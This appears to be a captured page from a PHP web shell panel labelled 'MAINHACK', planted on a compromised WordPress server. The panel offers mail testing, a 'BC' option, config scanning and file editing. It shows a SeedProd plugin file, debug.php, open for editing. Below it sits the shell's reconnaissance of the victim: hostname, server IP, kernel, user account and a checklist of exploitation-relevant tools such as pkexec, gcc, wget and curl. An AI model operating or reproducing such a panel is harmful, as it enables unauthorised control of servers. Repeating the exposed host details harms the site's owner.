[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: debug.php
<h1 class="sp-text-xl sp-mt-4 sp-mb-1"><?php esc_html_e( 'System Information', 'coming-soon' ); ?></h1> <textarea readonly="readonly" style="width: 100%; height: 500px"><?php echo esc_textarea( seedprod_lite_get_system_info() ); ?></textarea> <?php if ( ! empty( $_POST ) ) { // Nonce verification if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'debug-reset' ) ) { wp_die( 'Security check failed' ); } if ( ! empty( $_POST['sp_reset_cs'] ) && 1 == $_POST['sp_reset_cs'] ) { update_option( 'seedprod_coming_soon_page_id', false ); } if ( ! empty( $_POST['sp_reset_mm'] ) && 1 == $_POST['sp_reset_mm'] ) { update_option( 'seedprod_maintenance_mode_page_id', false ); } if ( ! empty( $_POST['sp_reset_p404'] ) && 1 == $_POST['sp_reset_p404'] ) { update_option( 'seedprod_404_page_id', false ); } if ( ! empty( $_POST['sp_reset_loginp'] ) && 1 == $_POST['sp_reset_loginp'] ) { update_option( 'seedprod_login_page_id', false ); } if ( ! empty( $_POST['sp_builder_debug'] ) && 1 == $_POST['sp_builder_debug'] ) { update_option( 'seedprod_builder_debug', true ); } elseif ( ! empty( $_POST ) ) { update_option( 'seedprod_builder_debug', false ); } } // get option $seedprod_builder_debug = get_option( 'seedprod_builder_debug' ); ?> <h1 class="sp-text-xl sp-mt-4 sp-mb-1"><?php esc_html_e( 'Debug Tools', 'coming-soon' ); ?></h1> <?php if ( ! empty( ! empty( $_POST ) ) ) { ?> <div id="setting-error-settings_updated" class="notice notice-success settings-error is-dismissible" style="margin:0px 20px 0 0"> <p><strong>Updated.</strong></p><button type="button" class="notice-dismiss"><span class="screen-reader-text">Dismiss this notice.</span></button></div> <?php } ?> <form method="post" novalidate="novalidate"> <?php wp_nonce_field( 'debug-reset' ); ?> <table class="form-table" role="presentation"> <tbody> <tr> <th scope="row">Builder Debug<br><small>If you are having a problem in the builder like inserting an image or some other feature in the builder is broken, check this box.</small></th> <td> <fieldset><legend class="screen-reader-text"><span>Builder Debug</span></legend><label for="sp_builder_debug"> <input name="sp_builder_debug" type="checkbox" id="sp_builder_debug" value="1" <?php echo ( ! empty( $seedprod_builder_debug ) ) ? 'checked' : ''; ?>> Enable Builder Debug</label> </fieldset></td> </tr> <tr> <th scope="row">Reset Coming Soon Page<br><small>This will delete the current coming soon page.</small></th> <td> <fieldset><legend class="screen-reader-text"><span>Builder Debug</span></legend><label for="sp_reset_cs"> <input name="sp_reset_cs" type="checkbox" id="sp_reset_cs" value="1"> Check Box and Save to Reset</label> </fieldset></td> </tr> <tr> <th scope="row">Reset Maintenance Mode Page<br><small>This will delete the current maintenance page.</small></th> <td> <fieldset><legend class="screen-reader-text"><span>Builder Debug</span></legend><label for="sp_reset_mm"> <input name="sp_reset_mm" type="checkbox" id="sp_reset_mm" value="1"> Check Box and Save to Reset</label> </fieldset></td> </tr> <tr> <th scope="row">Reset Login Page<br><small>This will delete the current Custom Login page.</small></th> <td> <fieldset><legend class="screen-reader-text"><span>Builder Debug</span></legend><label for="sp_reset_loginp"> <input name="sp_reset_loginp" type="checkbox" id="sp_reset_loginp" value="1"> Check Box and Save to Reset</label> </fieldset></td> </tr> <tr> <th scope="row">Reset 404 Page<br><small>This will delete the current 404 page.</small></th> <td> <fieldset><legend class="screen-reader-text"><span>Builder Debug</span></legend><label for="sp_reset_p404"> <input name="sp_reset_p404" type="checkbox" id="sp_reset_p404" value="1"> Check Box and Save to Reset</label> </fieldset></td> </tr></tbody> </table> <p class="submit"><input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes"></p> </form>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.47 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002